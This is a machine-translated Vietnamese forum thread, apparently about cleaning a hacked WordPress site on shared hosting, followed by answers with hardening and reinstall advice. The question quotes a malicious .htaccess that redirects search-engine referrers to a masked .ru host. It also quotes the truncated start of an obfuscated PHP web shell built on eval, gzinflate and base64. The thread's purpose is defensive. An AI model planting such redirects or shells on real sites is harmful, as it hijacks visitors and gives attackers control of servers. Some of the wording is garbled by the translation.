Làm sạch một trang web bị tấn công

Vì một vài monts một trang web của khách hàng bị tấn công bởi bot. Tôi đã thay đổi nguồn trang web (bây giờ là phiên bản mới nhất của wordpress), cố gắng dọn dẹp nhưng bot tìm thấy lỗ hổng trong trang trí ...

Sau khi bot hành động, tôi có thể tìm thấy các tập tin .htaccess trên trang web với cái này bên trong:

ErrorDocument 400 http://**********.ru/upday/index.php
ErrorDocument 401 http://**********.ru/upday/index.php

[...]

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|
altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|
metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|
rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch
|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search
|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick
|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey
|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro
|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase
|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)

RewriteRule ^(.*)$ http://*******.ru/upday/index.php [R=301,L]

[...]

Tôi có thể tìm thấy trong các tệp nhật ký của mình tệp được sử dụng để thêm .htaccess:

77.84.28.xxx domain.tdl - [23/Feb/2012:00:00:00 +0100] "POST /fichiers/cookiemw5.php
 HTTP/1.1" 200 34 "-" "-"

Với mã này bên trong:

<?php $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;
$default_charset="Windows-1251";preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A
\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64
\x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4Ck
REqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHC
tPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEk
tN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzru
mVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWHZrmq5Yysm45z49jTyPXHncgdOQICcu
mz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/ruGNr96fS4A607PTg+gsaa9cpzk3fVIF18MLGL1OL+dGwj
AQzKhlHgTkLPCodOWCzQSCFI4 [...]

Tôi xóa các tệp .php, các tệp .htaccess, nhưng chúng xuất hiện sau nhiều giờ hoặc vài phút ... Tiến trình tìm lỗ hổng / ngăn chặn cuộc tấn công bot là gì?

(đó là trên lưu trữ được chia sẻ (ovh.com)

Các bước bảo mật cơ bản

Vì Wordpress rất phổ biến, có rất nhiều ổ đĩa bị tấn công bằng cách lợi dụng các lỗ hổng trong bảo mật cơ bản. Tất cả người dùng Wordpress nên thực hiện các bước cơ bản và dễ dàng sau đây để tự bảo vệ mình: -

• Không sử dụng wp_ làm tiền tố bảng cơ sở dữ liệu, sử dụng bất kỳ chuỗi ký tự ngẫu nhiên nào hấp dẫn.
• Tắt các lỗi DB Wordpress.
• Đảm bảo thư mục của bạn được đặt thành chmod 755 và tệp 644.
• Sử dụng trình tạo mật khẩu an toàn (sử dụng ít nhất 15 ký tự).
• Không sử dụng admin làm tên người dùng.
• Đặt tệp .htaccess trống trong thư mục wp-admin.
• Đọc cứng Wordpress
• Kiểm tra Google Cache của trang web của bạn để biết phần mềm độc hại ẩn.
• Xóa <meta name="generator" content="WordPress X.X.X" />khỏi tiêu đề trang web của bạn bằng cách đặt remove_action('wp_head', 'wp_generator');vào tệp tin.php của bạn (ổ đĩa của kẻ tấn công sẽ không có cách dễ dàng để tìm phiên bản mà chúng đang nhắm mục tiêu).

TimThumb Hack

Ngoài ra còn có một ổ đĩa rất phổ biến do hack liên quan đến một phiên bản cũ của tập lệnh ngón tay cái thời gian phổ biến , gây ra nhiều vấn đề cho các quản trị web. Kiểm tra thư mục tải lên của bạn để biết các tệp php và đảm bảo bạn đã nâng cấp lên phiên bản mới nhất của tập lệnh để tránh điều này.

Khuyên bảo

Tôi chạy khoảng 10 Wordpress khác nhau và đã tìm thấy plugin và tài khoản WP-Security từ trình bảo vệ trang web là vô giá, nó quét trang web của bạn thường xuyên và báo cáo về lỗi bảo mật, phần mềm độc hại và thậm chí lỗi trang qua email để bạn có thể yên tâm rằng bạn biết khi nào đó đi sai

WP-Firewall cũng rất hữu ích để bảo vệ chống lại việc khai thác 0 ngày và VirusTotal rất tiện lợi nếu bạn nghi ngờ bị nhiễm trùng.

Akismet và Disqus.com là những công cụ hữu ích để bảo vệ chống lại spam nhận xét và bạn nên đọc wiki cộng đồng chuyên gia về chủ đề này .

Công cụ quản trị trang web

Bạn cũng nên đăng ký các công cụ quản trị trang web, nhưng nếu bạn nghi ngờ có sự lây nhiễm, hãy thực hiện tất cả các bước để tìm và dọn sạch nó trước hoặc bạn có thể sẽ cảnh báo người dùng của bạn rằng trang của bạn là một trang web tấn công được báo cáo.

Nếu phát hiện sự lây nhiễm, Google sẽ gửi email đến tất cả các địa chỉ sau đây abuse@, admin@, administrator@, contact@, info@, postmaster@, support@, webmaster@để bạn đảm bảo rằng bạn có ít nhất một trong số những địa điểm này và được theo dõi.

Dịch vụ xóa trả phí / Nơi nhận trợ giúp

Ngoài ra còn có một số trang web cung cấp dịch vụ loại bỏ phần mềm độc hại phải trả tiền, tôi sẽ rất nghi ngờ về những điều này - nhiều trang dường như là lừa đảo theo cách này hay cách khác.

Có rất nhiều trợ giúp và hỗ trợ chất lượng cao có sẵn miễn phí trong các diễn đàn wordpress , ở đây trên webmaster pro, trang web stackexchange của wordpress và trên stackoverflow . Đừng trả tiền cho những thứ bạn có thể tự sửa.

Bạn cần xóa hoàn toàn mọi tệp khỏi trang web của mình và thực hiện cài đặt Wordpress mới. Tỷ lệ cược là họ đã tải lên các tệp cho phép họ truy cập liên tục vào trang web của bạn. Trừ khi bạn muốn đi theo từng tệp cố gắng tìm ra cái nào chúng là một bản cài đặt hoàn chỉnh từ đầu là điều tốt nhất bạn có thể làm.